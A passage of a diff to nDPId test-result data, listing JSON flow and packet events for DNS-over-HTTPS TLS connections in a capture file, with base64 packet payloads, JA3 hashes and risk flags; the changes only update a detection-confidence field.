ZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} -01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 